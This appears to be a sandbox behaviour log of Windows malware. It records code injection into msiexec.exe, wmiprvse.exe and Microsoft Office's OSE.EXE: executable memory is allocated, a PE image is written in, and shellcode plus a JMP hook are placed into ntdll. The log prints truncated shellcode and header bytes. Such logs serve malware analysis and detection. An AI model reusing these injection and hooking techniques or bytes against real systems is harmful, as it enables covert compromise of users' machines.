Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2043009817
System info queried Type: BasicInformation success or wait 2043010029
System info queried Type: ProcessorInformation success or wait 2043010304
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2043010667
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043011233
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 1D 84 success or wait 2043032539
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043032885
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2043033493
System info queried Type: BasicInformation success or wait 2043033925
Memory allocated PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2043034033
System info queried Type: ProcessorInformation success or wait 2043034224
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043034274
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043034542
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2043034813
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2043035391
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043035516
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2043035627
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2046818384
Thread delayed Time: 0 TID: 4214 success or wait 2046819602
Thread delayed Time: 0 TID: 4214 success or wait 2046819705
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046820085
Thread delayed Time: 0 TID: 4214 success or wait 2046821044
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046821446
Thread delayed Time: 0 TID: 4214 success or wait 2046821643
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046822339
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2046844659
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046845025
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046845260
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046845639
Memory allocated PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2046845687
System info queried Type: BasicInformation success or wait 2046845970
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046846611
System info queried Type: ProcessorInformation success or wait 2046847101
System info queried Type: BasicInformation success or wait 2046847184
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046847416
System info queried Type: ProcessorInformation success or wait 2046848702
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2046848982
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046849682
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2046852994
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB904E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046853264
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046853546
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2046853699
System info queried Type: BasicInformation success or wait 2046853826
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2046854519
System info queried Type: ProcessorInformation success or wait 2046854791
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046855133
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046855616
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046855686
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2046856363
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046856659
System info queried Type: BasicInformation success or wait 2046856815
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046856904
System info queried Type: ProcessorInformation success or wait 2046857064
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046857800
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046858325
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2046883525
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046883818
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046884018
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046884495
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2046908266
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046908468
Memory allocated PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2046909842
System info queried Type: BasicInformation success or wait 2046909894
System info queried Type: ProcessorInformation success or wait 2046910120
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046910733
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911300
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911368
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB765C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911539
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911674
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046912367
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2048438697
Thread delayed Time: 0 TID: 4214 success or wait 2048439548
Thread delayed Time: 0 TID: 4214 success or wait 2048439650
System info queried Type: BasicInformation success or wait 2048440021
Thread delayed Time: 0 TID: 4214 success or wait 2048441004
System info queried Type: ProcessorInformation success or wait 2048441844
Thread delayed Time: 0 TID: 4214 success or wait 2048442109
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048442377
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2048465599
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048465976
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048466195
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048466459
Memory allocated PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: C00000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2048466566
System info queried Type: BasicInformation success or wait 2048466974
System info queried Type: ProcessorInformation success or wait 2048467278
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048467337
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048467568
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048467940
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048468074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048468615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2048468678
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048468939
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048469189
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2048469638
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2048469870
System info queried Type: BasicInformation success or wait 2048470307
System info queried Type: ProcessorInformation success or wait 2048470615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2048470989
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048471823
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7F660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048472114
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048472246
System info queried Type: BasicInformation success or wait 2048472956
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2048473015
System info queried Type: ProcessorInformation success or wait 2048473909
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048474558
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: C00000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2048498360
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048498684
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2048498939
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2048499139
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 2F 84 success or wait 2048594433
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048594507
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2048595003
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2048595307
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048595874
Memory allocated PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2048596330
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2048596430
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048596651
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048596821
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2048597090
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048597789
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048598038
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2049051522
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2049074297
Memory allocated PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 650000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2049075091
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049076666
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2049077286
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049077376
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049077942
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049078376
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2049078513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2049078689
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049078851
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049079197
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2049079822
